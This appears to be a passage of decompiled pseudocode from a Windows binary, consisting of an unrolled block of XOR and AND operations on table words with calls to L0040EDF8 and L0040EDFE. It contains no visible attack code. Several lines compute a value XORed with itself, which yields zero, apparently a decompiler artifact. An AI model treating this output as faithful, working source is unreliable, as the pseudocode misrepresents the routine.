                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1767 + _t1599 * 8 - 0x2b4);
                                                                                                                                                                                                                                                                                    					_t1600 = _v16;
                                                                                                                                                                                                                                                                                    					_t1768 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1768 + _t1600 * 8 - 0x78);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1768 + _t1600 * 8 - 0x74);
                                                                                                                                                                                                                                                                                    					_t1601 = _v16;
                                                                                                                                                                                                                                                                                    					_t1769 = _a4;
                                                                                                                                                                                                                                                                                    					_t1424 = _v16;
                                                                                                                                                                                                                                                                                    					_t2057 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1769 + _t1601 * 8 - 0x80) &  *(_t2057 + _t1424 * 8 - 0x98) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1769 + _t1601 * 8 - 0x7c) &  *(_t2057 + _t1424 * 8 - 0x94) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1770 = _v16;
                                                                                                                                                                                                                                                                                    					_t1425 = _a4;
                                                                                                                                                                                                                                                                                    					_t1605 = _v16;
                                                                                                                                                                                                                                                                                    					_t2058 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1425 + _t1770 * 8 - 0xe8) &  *(_t2058 + _t1605 * 8 - 0x208) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1425 + _t1770 * 8 - 0xe4) &  *(_t2058 + _t1605 * 8 - 0x204) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1608 = _v16;
                                                                                                                                                                                                                                                                                    					_t2059 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2059 + 0x10 + _t1608 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2059 + 0x14 + _t1608 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1609 = _v16;
                                                                                                                                                                                                                                                                                    					_t1779 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1779 + _t1609 * 8 - 0x2b0);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1779 + _t1609 * 8 - 0x2ac);
                                                                                                                                                                                                                                                                                    					_t1610 = _v16;
                                                                                                                                                                                                                                                                                    					_t1780 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1780 + _t1610 * 8 - 0x70);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1780 + _t1610 * 8 - 0x6c);
                                                                                                                                                                                                                                                                                    					_t1611 = _v16;
                                                                                                                                                                                                                                                                                    					_t1781 = _a4;
                                                                                                                                                                                                                                                                                    					_t1435 = _v16;
                                                                                                                                                                                                                                                                                    					_t2064 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1781 + _t1611 * 8 - 0x78) &  *(_t2064 + _t1435 * 8 - 0x90) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1781 + _t1611 * 8 - 0x74) &  *(_t2064 + _t1435 * 8 - 0x8c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1782 = _v16;
                                                                                                                                                                                                                                                                                    					_t1436 = _a4;
                                                                                                                                                                                                                                                                                    					_t1615 = _v16;
                                                                                                                                                                                                                                                                                    					_t2065 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1436 + _t1782 * 8 - 0xe0) &  *(_t2065 + _t1615 * 8 - 0x200) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1436 + _t1782 * 8 - 0xdc) &  *(_t2065 + _t1615 * 8 - 0x1fc) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1618 = _v16;
                                                                                                                                                                                                                                                                                    					_t2066 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2066 + 0x18 + _t1618 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2066 + 0x1c + _t1618 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1619 = _v16;
                                                                                                                                                                                                                                                                                    					_t1791 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1791 + _t1619 * 8 - 0x2a8);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1791 + _t1619 * 8 - 0x2a4);
                                                                                                                                                                                                                                                                                    					_t1620 = _v16;
                                                                                                                                                                                                                                                                                    					_t1792 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1792 + _t1620 * 8 - 0x68);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1792 + _t1620 * 8 - 0x64);
                                                                                                                                                                                                                                                                                    					_t1621 = _v16;
                                                                                                                                                                                                                                                                                    					_t1793 = _a4;
                                                                                                                                                                                                                                                                                    					_t1446 = _v16;
                                                                                                                                                                                                                                                                                    					_t2071 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1793 + _t1621 * 8 - 0x70) &  *(_t2071 + _t1446 * 8 - 0x88) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1793 + _t1621 * 8 - 0x6c) &  *(_t2071 + _t1446 * 8 - 0x84) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1794 = _v16;
                                                                                                                                                                                                                                                                                    					_t1447 = _a4;
                                                                                                                                                                                                                                                                                    					_t1625 = _v16;
                                                                                                                                                                                                                                                                                    					_t2072 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1447 + _t1794 * 8 - 0xd8) &  *(_t2072 + _t1625 * 8 - 0x1f8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1447 + _t1794 * 8 - 0xd4) &  *(_t2072 + _t1625 * 8 - 0x1f4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1628 = _v16;
                                                                                                                                                                                                                                                                                    					_t2073 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2073 + 0x20 + _t1628 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2073 + 0x24 + _t1628 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1629 = _v16;
                                                                                                                                                                                                                                                                                    					_t1803 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1803 + _t1629 * 8 - 0x2a0);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1803 + _t1629 * 8 - 0x29c);
                                                                                                                                                                                                                                                                                    					_t1630 = _v16;
                                                                                                                                                                                                                                                                                    					_t1804 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1804 + _t1630 * 8 - 0x60);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1804 + _t1630 * 8 - 0x5c);
                                                                                                                                                                                                                                                                                    					_t1631 = _v16;
                                                                                                                                                                                                                                                                                    					_t1805 = _a4;
                                                                                                                                                                                                                                                                                    					_t1457 = _v16;
                                                                                                                                                                                                                                                                                    					_t2078 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1805 + _t1631 * 8 - 0x68) &  *(_t2078 + _t1457 * 8 - 0x80) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1805 + _t1631 * 8 - 0x64) &  *(_t2078 + _t1457 * 8 - 0x7c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1806 = _v16;
                                                                                                                                                                                                                                                                                    					_t1458 = _a4;
                                                                                                                                                                                                                                                                                    					_t1635 = _v16;
                                                                                                                                                                                                                                                                                    					_t2079 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1458 + _t1806 * 8 - 0xd0) &  *(_t2079 + _t1635 * 8 - 0x1f0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1458 + _t1806 * 8 - 0xcc) &  *(_t2079 + _t1635 * 8 - 0x1ec) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1638 = _v16;
                                                                                                                                                                                                                                                                                    					_t2080 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2080 + 0x28 + _t1638 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2080 + 0x2c + _t1638 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1639 = _v16;
                                                                                                                                                                                                                                                                                    					_t1815 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1815 + _t1639 * 8 - 0x298);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1815 + _t1639 * 8 - 0x294);
                                                                                                                                                                                                                                                                                    					_t1640 = _v16;
                                                                                                                                                                                                                                                                                    					_t1816 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1816 + _t1640 * 8 - 0x58);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1816 + _t1640 * 8 - 0x54);
                                                                                                                                                                                                                                                                                    					_t1641 = _v16;
                                                                                                                                                                                                                                                                                    					_t1817 = _a4;
                                                                                                                                                                                                                                                                                    					_t1468 = _v16;
                                                                                                                                                                                                                                                                                    					_t2085 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1817 + _t1641 * 8 - 0x60) &  *(_t2085 + _t1468 * 8 - 0x78) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1817 + _t1641 * 8 - 0x5c) &  *(_t2085 + _t1468 * 8 - 0x74) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1818 = _v16;
                                                                                                                                                                                                                                                                                    					_t1469 = _a4;
                                                                                                                                                                                                                                                                                    					_t1645 = _v16;
                                                                                                                                                                                                                                                                                    					_t2086 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1469 + _t1818 * 8 - 0xc8) &  *(_t2086 + _t1645 * 8 - 0x1e8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1469 + _t1818 * 8 - 0xc4) &  *(_t2086 + _t1645 * 8 - 0x1e4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1648 = _v16;
                                                                                                                                                                                                                                                                                    					_t2087 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2087 + 0x30 + _t1648 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2087 + 0x34 + _t1648 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1649 = _v16;
                                                                                                                                                                                                                                                                                    					_t1827 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1827 + _t1649 * 8 - 0x290);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1827 + _t1649 * 8 - 0x28c);
                                                                                                                                                                                                                                                                                    					_t1650 = _v16;
                                                                                                                                                                                                                                                                                    					_t1828 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1828 + _t1650 * 8 - 0x50);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1828 + _t1650 * 8 - 0x4c);
                                                                                                                                                                                                                                                                                    					_t1651 = _v16;
                                                                                                                                                                                                                                                                                    					_t1829 = _a4;
                                                                                                                                                                                                                                                                                    					_t1479 = _v16;
                                                                                                                                                                                                                                                                                    					_t2092 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1829 + _t1651 * 8 - 0x58) &  *(_t2092 + _t1479 * 8 - 0x70) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1829 + _t1651 * 8 - 0x54) &  *(_t2092 + _t1479 * 8 - 0x6c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1830 = _v16;
                                                                                                                                                                                                                                                                                    					_t1480 = _a4;
                                                                                                                                                                                                                                                                                    					_t1655 = _v16;
                                                                                                                                                                                                                                                                                    					_t2093 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1480 + _t1830 * 8 - 0xc0) &  *(_t2093 + _t1655 * 8 - 0x1e0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1480 + _t1830 * 8 - 0xbc) &  *(_t2093 + _t1655 * 8 - 0x1dc) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1658 = _v16;
                                                                                                                                                                                                                                                                                    					_t2094 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2094 + 0x38 + _t1658 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2094 + 0x3c + _t1658 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1659 = _v16;
                                                                                                                                                                                                                                                                                    					_t1839 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1839 + _t1659 * 8 - 0x288);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1839 + _t1659 * 8 - 0x284);
                                                                                                                                                                                                                                                                                    					_t1660 = _v16;
                                                                                                                                                                                                                                                                                    					_t1840 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1840 + _t1660 * 8 - 0x48);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1840 + _t1660 * 8 - 0x44);
                                                                                                                                                                                                                                                                                    					_t1661 = _v16;
                                                                                                                                                                                                                                                                                    					_t1841 = _a4;
                                                                                                                                                                                                                                                                                    					_t1490 = _v16;
                                                                                                                                                                                                                                                                                    					_t2099 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1841 + _t1661 * 8 - 0x50) &  *(_t2099 + _t1490 * 8 - 0x68) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1841 + _t1661 * 8 - 0x4c) &  *(_t2099 + _t1490 * 8 - 0x64) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1842 = _v16;
                                                                                                                                                                                                                                                                                    					_t1491 = _a4;
                                                                                                                                                                                                                                                                                    					_t1665 = _v16;
                                                                                                                                                                                                                                                                                    					_t2100 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1491 + _t1842 * 8 - 0xb8) &  *(_t2100 + _t1665 * 8 - 0x1d8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1491 + _t1842 * 8 - 0xb4) &  *(_t2100 + _t1665 * 8 - 0x1d4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1668 = _v16;
                                                                                                                                                                                                                                                                                    					_t2101 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2101 + 0x40 + _t1668 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2101 + 0x44 + _t1668 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1669 = _v16;
                                                                                                                                                                                                                                                                                    					_t1851 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1851 + _t1669 * 8 - 0x280);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1851 + _t1669 * 8 - 0x27c);
                                                                                                                                                                                                                                                                                    					_t1670 = _v16;
                                                                                                                                                                                                                                                                                    					_t1852 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1852 + _t1670 * 8 - 0x40);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1852 + _t1670 * 8 - 0x3c);
                                                                                                                                                                                                                                                                                    					_t1671 = _v16;
                                                                                                                                                                                                                                                                                    					_t1853 = _a4;
                                                                                                                                                                                                                                                                                    					_t1501 = _v16;
                                                                                                                                                                                                                                                                                    					_t2106 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1853 + _t1671 * 8 - 0x48) &  *(_t2106 + _t1501 * 8 - 0x60) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1853 + _t1671 * 8 - 0x44) &  *(_t2106 + _t1501 * 8 - 0x5c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1854 = _v16;
                                                                                                                                                                                                                                                                                    					_t1502 = _a4;
                                                                                                                                                                                                                                                                                    					_t1675 = _v16;
                                                                                                                                                                                                                                                                                    					_t2107 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1502 + _t1854 * 8 - 0xb0) &  *(_t2107 + _t1675 * 8 - 0x1d0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1502 + _t1854 * 8 - 0xac) &  *(_t2107 + _t1675 * 8 - 0x1cc) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1678 = _v16;
                                                                                                                                                                                                                                                                                    					_t2108 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2108 + 0x48 + _t1678 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2108 + 0x4c + _t1678 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1679 = _v16;
                                                                                                                                                                                                                                                                                    					_t1863 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1863 + _t1679 * 8 - 0x278);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1863 + _t1679 * 8 - 0x274);
                                                                                                                                                                                                                                                                                    					_t1680 = _v16;
                                                                                                                                                                                                                                                                                    					_t1864 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1864 + _t1680 * 8 - 0x38);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1864 + _t1680 * 8 - 0x34);
                                                                                                                                                                                                                                                                                    					_t1681 = _v16;
                                                                                                                                                                                                                                                                                    					_t1865 = _a4;
                                                                                                                                                                                                                                                                                    					_t1512 = _v16;
                                                                                                                                                                                                                                                                                    					_t2113 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1865 + _t1681 * 8 - 0x40) &  *(_t2113 + _t1512 * 8 - 0x58) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1865 + _t1681 * 8 - 0x3c) &  *(_t2113 + _t1512 * 8 - 0x54) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1866 = _v16;
                                                                                                                                                                                                                                                                                    					_t1513 = _a4;
                                                                                                                                                                                                                                                                                    					_t1685 = _v16;
                                                                                                                                                                                                                                                                                    					_t2114 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1513 + _t1866 * 8 - 0xa8) &  *(_t2114 + _t1685 * 8 - 0x1c8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1513 + _t1866 * 8 - 0xa4) &  *(_t2114 + _t1685 * 8 - 0x1c4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1688 = _v16;
                                                                                                                                                                                                                                                                                    					_t2115 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2115 + 0x50 + _t1688 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2115 + 0x54 + _t1688 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1689 = _v16;
                                                                                                                                                                                                                                                                                    					_t1875 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1875 + _t1689 * 8 - 0x270);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1875 + _t1689 * 8 - 0x26c);
                                                                                                                                                                                                                                                                                    					_t1690 = _v16;
                                                                                                                                                                                                                                                                                    					_t1876 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1876 + _t1690 * 8 - 0x30);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1876 + _t1690 * 8 - 0x2c);
                                                                                                                                                                                                                                                                                    					_t1691 = _v16;
                                                                                                                                                                                                                                                                                    					_t1877 = _a4;
                                                                                                                                                                                                                                                                                    					_t1523 = _v16;
                                                                                                                                                                                                                                                                                    					_t2120 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1877 + _t1691 * 8 - 0x38) &  *(_t2120 + _t1523 * 8 - 0x50) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1877 + _t1691 * 8 - 0x34) &  *(_t2120 + _t1523 * 8 - 0x4c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1878 = _v16;
                                                                                                                                                                                                                                                                                    					_t1524 = _a4;
                                                                                                                                                                                                                                                                                    					_t1695 = _v16;
                                                                                                                                                                                                                                                                                    					_t2121 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1524 + _t1878 * 8 - 0xa0) &  *(_t2121 + _t1695 * 8 - 0x1c0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1524 + _t1878 * 8 - 0x9c) &  *(_t2121 + _t1695 * 8 - 0x1bc) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1698 = _v16;
                                                                                                                                                                                                                                                                                    					_t2122 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2122 + 0x58 + _t1698 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2122 + 0x5c + _t1698 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1699 = _v16;
                                                                                                                                                                                                                                                                                    					_t1887 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1887 + _t1699 * 8 - 0x268);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1887 + _t1699 * 8 - 0x264);
                                                                                                                                                                                                                                                                                    					_t1700 = _v16;
                                                                                                                                                                                                                                                                                    					_t1888 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1888 + _t1700 * 8 - 0x28);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1888 + _t1700 * 8 - 0x24);
                                                                                                                                                                                                                                                                                    					_t1701 = _v16;
                                                                                                                                                                                                                                                                                    					_t1889 = _a4;
                                                                                                                                                                                                                                                                                    					_t1534 = _v16;
                                                                                                                                                                                                                                                                                    					_t2127 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1889 + _t1701 * 8 - 0x30) &  *(_t2127 + _t1534 * 8 - 0x48) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1889 + _t1701 * 8 - 0x2c) &  *(_t2127 + _t1534 * 8 - 0x44) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1890 = _v16;
                                                                                                                                                                                                                                                                                    					_t1535 = _a4;
                                                                                                                                                                                                                                                                                    					_t1705 = _v16;
                                                                                                                                                                                                                                                                                    					_t2128 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1535 + _t1890 * 8 - 0x98) &  *(_t2128 + _t1705 * 8 - 0x1b8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1535 + _t1890 * 8 - 0x94) &  *(_t2128 + _t1705 * 8 - 0x1b4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1708 = _v16;
                                                                                                                                                                                                                                                                                    					_t2129 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2129 + 0x60 + _t1708 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2129 + 0x64 + _t1708 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1709 = _v16;
                                                                                                                                                                                                                                                                                    					_t1899 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1899 + _t1709 * 8 - 0x260);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1899 + _t1709 * 8 - 0x25c);
                                                                                                                                                                                                                                                                                    					_t1710 = _v16;
                                                                                                                                                                                                                                                                                    					_t1900 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1900 + _t1710 * 8 - 0x20);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1900 + _t1710 * 8 - 0x1c);
                                                                                                                                                                                                                                                                                    					_t1711 = _v16;
                                                                                                                                                                                                                                                                                    					_t1901 = _a4;
                                                                                                                                                                                                                                                                                    					_t1545 = _v16;
                                                                                                                                                                                                                                                                                    					_t2134 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1901 + _t1711 * 8 - 0x28) &  *(_t2134 + _t1545 * 8 - 0x40) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1901 + _t1711 * 8 - 0x24) &  *(_t2134 + _t1545 * 8 - 0x3c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1902 = _v16;
                                                                                                                                                                                                                                                                                    					_t1546 = _a4;
                                                                                                                                                                                                                                                                                    					_t1715 = _v16;
                                                                                                                                                                                                                                                                                    					_t2135 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1546 + _t1902 * 8 - 0x90) &  *(_t2135 + _t1715 * 8 - 0x1b0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1546 + _t1902 * 8 - 0x8c) &  *(_t2135 + _t1715 * 8 - 0x1ac) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1718 = _v16;
                                                                                                                                                                                                                                                                                    					_t2136 = _a4;
